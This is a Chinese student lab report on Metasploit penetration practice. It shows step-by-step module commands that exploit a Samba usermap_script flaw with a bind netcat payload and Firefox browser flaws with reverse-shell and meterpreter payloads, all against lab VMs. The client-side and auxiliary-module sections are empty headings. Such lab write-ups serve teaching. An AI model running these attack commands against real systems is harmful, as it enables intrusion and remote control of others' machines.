20192409潘则宇 实验六 Metasploit攻击渗透实践
作者:互联网
Metasploit攻击渗透实践
1.实验内容及要求
本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:
- 一个主动攻击实践,尽量使用最新的类似漏洞;
- 一个针对浏览器的攻击,尽量使用最新的类似漏洞;
- 一个针对客户端的攻击,如Adobe或office,尽量使用最新的类似漏洞;
- 成功应用任何一个辅助模块。
以上四个小实践可不限于以上示例,并要求至少有一个是和其他所有同学不一样的。
2.实验过程
2.1 主动攻击实践
(1)这里我选择了跟上次实践测试一样的靶机和漏洞进行渗透。使用的是王老师给的Linux靶机,利用的是靶机上Samba服务的usermap_script安全漏洞。
(2)要进行渗透,我们首先需要知道靶机的IP地址,所以就在靶机上使用ifconfig进行查询。
ifconfig
图一 查询靶机IP地址
(3)然后还是跟正常渗透一样,选择攻击模块,这里我们利用的是Samba服务上的漏洞,所以我们使用指令search samba对我们可以使用的攻击模块进行一个搜索,得到的结果如下图所示。
search samba
图二 查询攻击模块
(4)我们发现了我们需要选择的攻击模块,就是这个usermap_script,可以使用use exploit/multi/samba/usermap_script指令,或者直接用use 8,也就是使用我们检索出来的第八个模块的意思,也是一样的。
use exploit/multi/samba/usermap_script
use 8
图三 使用攻击模块
(5)然后需要对攻击载荷进行设置,我们还是一样,先使用show options查看所有可以使用的攻击载荷,查询结果如下所示。
show options
图四 查看攻击载荷
(6)我们找到我们想要的攻击载荷,也就是这个bind_netcat,所以我们使用指令set payload cmd/unix/bind_netcat或者是set payload 5来设置我们的攻击载荷。
set payload cmd/unix/bind_netcat
set payload 5
图五 设置攻击载荷
(7)然后就可以使用show options指令来查看我们需要添加的具体信息。
show options
图六 查看设置
(8)我们通过查看到的信息可以发现,我们只需要对RHOST也就是靶机的IP地址进行设置就可以了,所以我们使用指令set RHOST 192.168.189.131进行设置。
set RHOST 192.168.189.131
图七 设置RHOST
(9)最后,我们就可以使用exploit来获取靶机的Shell了。
exploit
图八 exploit
2.2 浏览器攻击实践
(1)这里采用的靶机是我自己安装的XP系统,要进行浏览器攻击,首先得选好浏览器,所以我选择了火狐浏览器(平时用的都是火狐)。
(2)首先我们还是要知道有什么攻击模块可以进行选择,所以我们使用search firefox指令来看看,得到了以下结果。
search firefox
图九 search firefox
(3)查询到的exploit开头的就是我们可以利用的漏洞,也就是我们要进行选择的攻击模块了。我们可以看到,可供我们进行渗透的模块还是很多的。其中有两个攻击模块引起了我的注意,分别是exploit/multi/browser/firefox_webidl_injection和exploit/multi/browser/firefox_tostring_console_injection,因为这两个攻击模块都带有“injection”也就是注入这个描述,所以我认为成功的概率比较大。我先尝试了exploit/multi/browser/firefox_webidl_injection模块的渗透测试,使用use 30指令可以直接选取这个攻击模块。
use exploit/multi/browser/firefox_webidl_injection
use 30
图十 选择攻击模块
(4)然后我们就可以查看一下有哪些攻击载荷可供选择,使用show payloads指令。
show payloads
图十一 查看攻击载荷
(5)我们能看到这里能选择的攻击载荷并不是很多,一共有九个,我们选择编号为2的这个攻击载荷,使用指令set payload 2。
set payload firefox/shell_reverse_tcp
set payload 2
图十二 选择攻击载荷
(6)选择完攻击载荷后我们就可以使用show options指令来查看我们需要添加或者修改的参数。
show options
图十三 查看参数
(7)我们可以发现,其他参数都已经自动填写了,需要我们进行补充的只有一个URIPATH,也就是我们生成的网址的填充部分,我们使用set指令将其设置为20192409pzy。
set URIPATH 20192409pzy
图十四 设置URIPATH
(8)设置完参数我们就可以开启监听啦。
exploit
run
图十五 exploit
(9)开启监听之后我们发现它给我们提供了一个网址,也就是http://172.16.213.126:8080/20192409pzy,我们需要将这个网址在我们的靶机也就是XP虚拟机中的火狐浏览器中进行访问,才能得靶机的Shell。我们在靶机的火狐进行访问之后,我们发现已经建立了反弹连接并生成了一个会话,渗透成功。
图十六 反弹连接成功
(10)反弹连接成功了,但是我们发现我们并不能对靶机进行操作,这是因为我们需要将会话打开,使用指令sessions -i 1,然后我们就可以进行操作了,比如这里我们使用的是dir指令。
sessions -i 1
dir
图十七 打开会话
(11)但是我们还想做进一步渗透,所以我们需要利用到火狐的另一个漏洞,我们使用指令use exploit/firefox/local/exec_shellcode打开对应的攻击模块。
use exploit/firefox/local/exec_shellcode
图十八 选择攻击模块
(12)然后我们还是一样使用show payloads指令来查看有哪些攻击载荷可以进行选择。
show payloads
图十九 查看攻击载荷
(13)这里攻击载荷非常多,有三百多个,我根据经验选择了编号为271的这个攻击载荷。
set payload windows/meterpreter/reverse_tcp
set payload 271
图二十 选择攻击载荷
(14)还是一样使用show options来查看我们需要填写的参数,我们发现只需要填写一个会话号就可以了,所以我们使用指令set SESSION 2(因为前一个会话关了,所以这里是我新创建的一个会话),这样就可以了吗?不行,因为4444端口前面我们进行渗透的时候正在使用,所以这里我们需要将端口号换掉。
set SESSION 2
set LPORT 8888
图二十一 设置会话号
图二十二 设置端口
(15)这样设置完之后我们就可以开启监听啦。
exploit
run
图二十三 exploit
(16)我们发现,进一步渗透也成功啦。我们同样使用dir指令来测试,我们发现在meterpreter界面下,渗透更加深入,我们得到的信息也更加清晰完整。
图二十四 dir操作
(17)然后我们就进行另一个漏洞的渗透,过程都是一样的。我们还是先选择攻击模块,使用指令use exploit/multi/browser/firefox_tostring_console_injection或者是use 39。
use exploit/multi/browser/firefox_tostring_console_injection
use 39
图二十五 选择攻击模块
(18)同样的我们选择编号为2的攻击载荷。
set payload firefox/shell_reverse_tcp
set payload 2
图二十六 设置攻击载荷
(19)然后设置URIPATH为201912409,并开启监听。
set URIPATH 20192409
explit
run
图二十七 设置URIPATH并开启监听
(20)这时候我们发现反弹连接成功,照旧打开会话,就可以进行一系列操作了。
sessions -i 1
dir
图二十八 打开会话并查看dir
(21)后面进一步渗透的部分与前面一样,就不再赘述了。
2.3 客户端攻击实践
2.4 辅助模块应用
标签:Metasploit,载荷,20192409,攻击,exploit,set,模块,潘则宇,我们 来源: https://www.cnblogs.com/20001009fxy/p/16248905.html